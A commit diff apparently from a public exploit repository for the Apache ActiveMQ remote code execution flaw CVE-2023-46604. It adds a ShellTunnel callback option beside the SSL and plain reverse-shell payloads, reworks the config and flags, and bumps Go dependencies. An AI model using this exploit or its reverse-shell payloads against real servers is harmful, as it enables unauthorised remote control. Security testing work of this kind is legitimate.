Update to go-exploit 1.30.1 and pull in ShellTunnel

cve-2023-46604.go

@@ -4,7 +4,6 @@ import (
 	"bytes"
 	b64 "encoding/base64"
 	"encoding/binary"
-	"flag"
 	"fmt"
 	"net/http"
 	"regexp"
@@ -130,7 +129,7 @@ func httpServerStart() {
 func generatePayload(conf *config.Config) (string, bool) {
 	generated := ""
 
-	switch conf.C2Type {
+	switch conf.ResolveC2Payload() {
 	case c2.SSLShellServer:
 		output.PrintfStatus("Sending an SSL reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
 		generated = reverse.JJS.Default(conf.Lhost, conf.Lport, true)
@@ -216,15 +215,19 @@ func (sploit ActiveMQRCE) RunExploit(conf *config.Config) bool {
 }
 
 func main() {
-	flag.StringVar(&globalHTTPAddr, "httpAddr", "", "The address the HTTP server should bind to")
-	flag.IntVar(&globalHTTPPort, "httpPort", 8080, "The port the HTTP server should bind to")
-
 	supportedC2 := []c2.Impl{
 		c2.SSLShellServer,
 		c2.SimpleShellServer,
+		c2.ShellTunnel,
 		c2.HTTPServeFile,
 	}
-	conf := config.New(config.CodeExecution, supportedC2, "ActiveMQ", "CVE-2023-46604", 61616)
+	conf := config.NewRemoteExploit(
+		config.ImplementedFeatures{AssetDetection: true, VersionScanning: true, Exploitation: true},
+		config.CodeExecution, supportedC2, "Apache", []string{"ActiveMQ"},
+		[]string{"cpe:2.3:a:apache:activemq"}, "CVE-2023-46604", "ActiveMQ", 61616)
+
+	conf.CreateStringVarFlag(&globalHTTPAddr, "httpAddr", "", "The address the HTTP server should bind to")
+	conf.CreateIntVarFlag(&globalHTTPPort, "httpPort", 8080, "The port the HTTP server should bind to")
 
 	sploit := ActiveMQRCE{}
 	exploit.RunProgram(sploit, conf)

go.mod

@@ -1,8 +1,8 @@
 module github.com/vulncheck-oss/cve-2023-46604
 
-go 1.22.2
+go 1.23.1
 
-require github.com/vulncheck-oss/go-exploit v1.22.0
+require github.com/vulncheck-oss/go-exploit v1.30.1
 
 require (
 	github.com/dustin/go-humanize v1.0.1 // indirect
@@ -11,14 +11,14 @@ require (
 	github.com/mattn/go-isatty v0.0.20 // indirect
 	github.com/ncruces/go-strftime v0.1.9 // indirect
 	github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
-	golang.org/x/net v0.27.0 // indirect
-	golang.org/x/sys v0.22.0 // indirect
-	golang.org/x/text v0.16.0 // indirect
+	golang.org/x/net v0.30.0 // indirect
+	golang.org/x/sys v0.26.0 // indirect
+	golang.org/x/text v0.19.0 // indirect
 	modernc.org/gc/v3 v3.0.0-20240107210532-573471604cb6 // indirect
 	modernc.org/libc v1.55.3 // indirect
 	modernc.org/mathutil v1.6.0 // indirect
 	modernc.org/memory v1.8.0 // indirect
-	modernc.org/sqlite v1.31.1 // indirect
+	modernc.org/sqlite v1.33.1 // indirect
 	modernc.org/strutil v1.2.0 // indirect
 	modernc.org/token v1.1.0 // indirect
 )

go.sum

@@ -14,19 +14,19 @@ github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZb
 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
 github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE=
 github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo=
-github.com/vulncheck-oss/go-exploit v1.22.0 h1:AaUdtdLEtxm8x2RuYUgzO5Yhdlxr+UPAEQZRhsq03kI=
-github.com/vulncheck-oss/go-exploit v1.22.0/go.mod h1:tD/dsYNnQ1DI1Hus+x/9jVN0rU2MNuwKcKFh+8Y1odk=
+github.com/vulncheck-oss/go-exploit v1.30.1 h1:pR9rIHfVG5KjKau4gIlsXkxrq+nvUd6WAdnlYfTN/GQ=
+github.com/vulncheck-oss/go-exploit v1.30.1/go.mod h1:QFpipRVb9o4hTlsvRD1f/IIgaLc9/jelWc3RC9OJwkE=
 golang.org/x/mod v0.17.0 h1:zY54UmvipHiNd+pm+m0x9KhZ9hl1/7QNMyxXbc6ICqA=
 golang.org/x/mod v0.17.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
-golang.org/x/net v0.27.0 h1:5K3Njcw06/l2y9vpGCSdcxWOYHOUk3dVNGDXN+FvAys=
-golang.org/x/net v0.27.0/go.mod h1:dDi0PyhWNoiUOrAS8uXv/vnScO4wnHQO4mj9fn/RytE=
-golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M=
-golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
+golang.org/x/net v0.30.0 h1:AcW1SDZMkb8IpzCdQUaIq2sP4sZ4zw+55h6ynffypl4=
+golang.org/x/net v0.30.0/go.mod h1:2wGyMJ5iFasEhkwi13ChkO/t1ECNC4X4eBKkVFyYFlU=
+golang.org/x/sync v0.8.0 h1:3NFvSEYkUoMifnESzZl15y791HH1qU2xm6eCJU5ZPXQ=
+golang.org/x/sync v0.8.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
 golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.22.0 h1:RI27ohtqKCnwULzJLqkv897zojh5/DwS/ENaMzUOaWI=
-golang.org/x/sys v0.22.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
-golang.org/x/text v0.16.0 h1:a94ExnEXNtEwYLGJSIUxnWoxoRz/ZcCsV63ROupILh4=
-golang.org/x/text v0.16.0/go.mod h1:GhwF1Be+LQoKShO3cGOHzqOgRrGaYc9AvblQOmPVHnI=
+golang.org/x/sys v0.26.0 h1:KHjCJyddX0LoSTb3J+vWpupP9p0oznkqVk/IfjymZbo=
+golang.org/x/sys v0.26.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
+golang.org/x/text v0.19.0 h1:kTxAhCbGbxhK0IwgSKiMO5awPoDQ0RpfiVYBfK860YM=
+golang.org/x/text v0.19.0/go.mod h1:BuEKDfySbSR4drPmRPG/7iBdf8hvFMuRexcpahXilzY=
 golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d h1:vU5i/LfpvrRCpgM/VPfJLg5KjxD3E+hfT1SH+d9zLwg=
 golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d/go.mod h1:aiJjzUbINMkxbQROHiO6hDPo2LHcIPhhQsa9DLh0yGk=
 modernc.org/cc/v4 v4.21.4 h1:3Be/Rdo1fpr8GrQ7IVw9OHtplU4gWbb+wNgeoBMmGLQ=
@@ -49,8 +49,8 @@ modernc.org/opt v0.1.3 h1:3XOZf2yznlhC+ibLltsDGzABUGVx8J6pnFMS3E4dcq4=
 modernc.org/opt v0.1.3/go.mod h1:WdSiB5evDcignE70guQKxYUl14mgWtbClRi5wmkkTX0=
 modernc.org/sortutil v1.2.0 h1:jQiD3PfS2REGJNzNCMMaLSp/wdMNieTbKX920Cqdgqc=
 modernc.org/sortutil v1.2.0/go.mod h1:TKU2s7kJMf1AE84OoiGppNHJwvB753OYfNl2WRb++Ss=
-modernc.org/sqlite v1.31.1 h1:XVU0VyzxrYHlBhIs1DiEgSl0ZtdnPtbLVy8hSkzxGrs=
-modernc.org/sqlite v1.31.1/go.mod h1:UqoylwmTb9F+IqXERT8bW9zzOWN8qwAIcLdzeBZs4hA=
+modernc.org/sqlite v1.33.1 h1:trb6Z3YYoeM9eDL1O8do81kP+0ejv+YzgyFo+Gwy0nM=
+modernc.org/sqlite v1.33.1/go.mod h1:pXV2xHxhzXZsgT/RtTFAPY6JJDEvOTcTdwADQCCWD4k=
 modernc.org/strutil v1.2.0 h1:agBi9dp1I+eOnxXeiZawM8F4LawKv4NzGWSaLfyeNZA=
 modernc.org/strutil v1.2.0/go.mod h1:/mdcBmfOibveCTBxUl5B5l6W+TTH1FXPLHZE6bTosX0=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=